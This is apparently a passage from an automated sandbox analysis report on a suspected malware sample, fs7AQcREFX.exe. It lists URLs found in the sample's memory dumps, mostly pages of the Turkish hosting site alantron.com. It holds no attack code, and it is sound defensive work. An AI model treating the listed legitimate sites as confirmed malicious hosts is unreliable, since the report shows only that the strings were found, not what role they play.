00000000.00000003.407501333.0000000003110000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.609857809.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.569095277.0000000003830000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.493154321.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.514211859.0000000000D50000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.628447842.0000000002D00000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.515047997.0000000000D70000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.630741825.0000000000D60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://support.lolipop.jp/hc/ja/articles/360049132953
                      Source: fs7AQcREFX.exe, 00000000.00000003.407390186.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.512849987.0000000000B90000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.513941237.0000000000D50000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.401612520.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448619967.0000000003230000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.399549475.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.408206344.0000000003110000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.525348360.0000000003A70000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.517712783.00000000031F0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.402720609.0000000003850000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.407501333.0000000003110000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.609857809.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.569095277.0000000003830000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.493154321.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.514211859.0000000000D50000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.515047997.0000000000D70000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.513206122.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.397997118.0000000003600000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.520718818.0000000002F00000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://tickets.suresupport.com/faq/article-1596/en
                      Source: fs7AQcREFX.exe, 00000000.00000003.393699093.0000000000ADA000.00000004.00000020.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.393651051.000000000617C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.abart.com.pl
                      Source: fs7AQcREFX.exe, 00000000.00000003.511573881.0000000000B14000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.abart.com.plP
                      Source: fs7AQcREFX.exe, 00000000.00000003.407390186.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.401612520.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448619967.0000000003230000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.399549475.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.408206344.0000000003110000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.525348360.0000000003A70000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.517712783.00000000031F0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.402720609.0000000003850000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.407501333.0000000003110000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.609857809.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.569095277.0000000003830000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.493154321.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.397997118.0000000003600000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.520718818.0000000002F00000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.411092041.0000000003160000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.440264697.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.398199427.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.517172157.0000000000B90000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.aevga.com/
                      Source: fs7AQcREFX.exe, 00000000.00000003.617381014.0000000004020000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.alantron.com
                      Source: fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.501507543.0000000000B40000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.499317836.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.617381014.0000000004020000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.alantron.com/
                      Source: fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.501507543.0000000000B40000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.499317836.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.617381014.0000000004020000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.alantron.com/english/
                      Source: fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.501507543.0000000000B40000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.499317836.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.617381014.0000000004020000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.alantron.com/favicon.gif
                      Source: fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.501507543.0000000000B40000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.499317836.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.617381014.0000000004020000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.alantron.com/favicon.ico
                      Source: fs7AQcREFX.exe, 00000000.00000003.617381014.0000000004020000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.alantron.com/garanti.to
                      Source: fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.501507543.0000000000B40000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.499317836.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.617381014.0000000004020000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.alantron.com/oossetaccess-2.to
                      Source: fs7AQcREFX.exe, 00000000.00000003.617381014.0000000004020000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.alantron.com/turkce/alan-adi-bayiligi.to
                      Source: fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.501507543.0000000000B40000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.499317836.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.617381014.0000000004020000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.alantron.com/turkce/alan-adi-kayit/domain_search_yn.to
                      Source: fs7AQcREFX.exe, 00000000.00000003.617381014.0000000004020000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.alantron.com/turkce/alan-adi-sorgulama.to
                      Source: fs7AQcREFX.exe, 00000000.00000003.617381014.0000000004020000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.alantron.com/turkce/alan-adi-toplu-kayit.to
                      Source: fs7AQcREFX.exe, 00000000.00000003.617381014.0000000004020000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.alantron.com/turkce/alan-adi-toplu-transfer.to
                      Source: fs7AQcREFX.exe, 00000000.00000003.617381014.0000000004020000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.alantron.com/turkce/alan-adi-transfer.to
                      Source: fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.501507543.0000000000B40000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.499317836.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.617381014.0000000004020000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.alantron.com/turkce/alan-adi-yonetimi.to
                      Source: fs7AQcREFX.exe, 00000000.00000003.617381014.0000000004020000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.alantron.com/turkce/backorder-arama.to
                      Source: fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.501507543.0000000000B40000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.499317836.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.617381014.0000000004020000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.alantron.com/turkce/bayiler/r_form.to
                      Source: fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.501507543.0000000000B40000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.499317836.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.617381014.0000000004020000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.alantron.com/turkce/destek/api/package/index.php?/
                      Source: fs7AQcREFX.exe, 00000000.00000003.617381014.0000000004020000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.alantron.com/turkce/destek/messages.to
                      Source: fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.501507543.0000000000B40000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.499317836.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.617381014.0000000004020000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.alantron.com/turkce/destek/search.to
                      Source: fs7AQcREFX.exe, 00000000.00000003.617381014.0000000004020000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.alantron.com/turkce/destek/support.to
                      Source: fs7AQcREFX.exe, 00000000.00000003.617381014.0000000004020000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.alantron.com/turkce/destek/support_main.to
                      Source: fs7AQcREFX.exe, 00000000.00000003.617381014.0000000004020000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.alantron.com/turkce/destek/video/
                      Source: fs7AQcREFX.exe, 00000000.00000003.617381014.0000000004020000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.alantron.com/turkce/destek/write.to
                      Source: fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.501507543.0000000000B40000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.499317836.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.617381014.0000000004020000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.alantron.com/turkce/email-hosting-yonetimi.to
                      Source: fs7AQcREFX.exe, 00000000.00000003.617381014.0000000004020000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.alantron.com/turkce/email-hosting.to
                      Source: fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.501507543.0000000000B40000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.499317836.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.617381014.0000000004020000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.alantron.com/turkce/email-hosting/gelismis_info_email.to
                      Source: fs7AQcREFX.exe, 00000000.00000003.617381014.0000000004020000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.alantron.com/turkce/email-hosting/renewal.to
                      Source: fs7AQcREFX.exe, 00000000.00000003.617381014.0000000004020000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.alantron.com/turkce/guvenlik-sertifikasi.to
                      Source: fs7AQcREFX.exe, 00000000.00000003.617381014.0000000004020000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.alantron.com/turkce/hesap-yonetimi.to
                      Source: fs7AQcREFX.exe, 00000000.00000003.617381014.0000000004020000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.alantron.com/turkce/hesap-yonetimi/a_new_user.to
                      Source: fs7AQcREFX.exe, 00000000.00000003.617381014.0000000004020000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.alantron.com/turkce/hesap-yonetimi/login.to?d=renewal
                      Source: fs7AQcREFX.exe, 00000000.00000003.617381014.0000000004020000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.alantron.com/turkce/icann/agreement.to
                      Source: fs7AQcREFX.exe, 00000000.00000003.617381014.0000000004020000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.alantron.com/turkce/icann/antispam.to
                      Source: fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.501507543.0000000000B40000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.499317836.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.617381014.0000000004020000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.alantron.com/turkce/icann/id.to
                      Source: fs7AQcREFX.exe, 00000000.00000003.617381014.0000000004020000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.alantron.com/turkce/icann/privacy.to
                      Source: fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.501507543.0000000000B40000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.499317836.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.617381014.0000000004020000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.alantron.com/turkce/iletisim.to
                      Source: fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.501507543.0000000000B40000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.499317836.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.617381014.0000000004020000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.alantron.com/turkce/ssl/new_user.to?plan=server
                      Source: fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.501507543.0000000000B40000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.499317836.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.617381014.0000000004020000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.alantron.com/turkce/ssl/new_user.to?plan=standard
                      Source: fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.501507543.0000000000B40000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.499317836.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.617381014.0000000004020000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.alantron.com/turkce/ssl/new_user.to?plan=unlimited
                      Source: fs7AQcREFX.exe, 00000000.00000003.617381014.0000000004020000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.alantron.com/turkce/ssl/renewal.to
                      Source: fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.501507543.0000000000B40000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.499317836.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.617381014.0000000004020000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.alantron.com/turkce/ssl/tarayicilar.to
                      Source: fs7AQcREFX.exe, 00000000.00000003.617381014.0000000004020000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.alantron.com/turkce/statu/statu.to
                      Source: fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.501507543.0000000000B40000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.499317836.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.617381014.0000000004020000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.alantron.com/turkce/web-hosting-yonetimi.to
                      Source: fs7AQcREFX.exe, 00000000.00000003.617381014.0000000004020000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.alantron.com/turkce/web-hosting.to
                      Source: fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.501507543.0000000000B40000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.499317836.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.617381014.0000000004020000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.alantron.com/turkce/web-hosting/detay/attributes.to
                      Source: fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.501507543.0000000000B40000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.499317836.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.617381014.0000000004020000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.alantron.com/turkce/web-hosting/detay/hosting_compare_w.to
                      Source: fs7AQcREFX.exe, 00000000.00000003.617381014.0000000004020000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.alantron.com/turkce/web-hosting/detay/mysql20/mysql20.to
                      Source: fs7AQcREFX.exe, 00000000.00000003.617381014.0000000004020000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.alantron.com/turkce/web-hosting/detay/mysql60/mysql60.to
                      Source: fs7AQcREFX.exe, 00000000.00000003.617381014.0000000004020000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.alantron.com/turkce/web-hosting/detay/mysql90/mysql90.to
                      Source: fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.501507543.0000000000B40000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.499317836.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.617381014.0000000004020000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.alantron.com/turkce/web-hosting/garanti.to
                      Source: fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.501507543.0000000000B40000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.499317836.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.617381014.0000000004020000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.alantron.com/turkce/web-hosting/new_user.to?plan=mysql20
                      Source: fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.501507543.0000000000B40000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.499317836.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.617381014.0000000004020000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.alantron.com/turkce/web-hosting/new_user.to?plan=mysql60
                      Source: fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.501507543.0000000000B40000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.499317836.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.617381014.0000000004020000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.alantron.com/turkce/web-hosting/new_user.to?plan=mysql90
                      Source: fs7AQcREFX.exe, 00000000.00000003.617381014.0000000004020000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.alantron.com/turkce/web-hosting/prof.to
                      Source: fs7AQcREFX.exe, 00000000.00000003.617381014.0000000004020000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.alantron.com/turkce/web-hosting/renewal.to
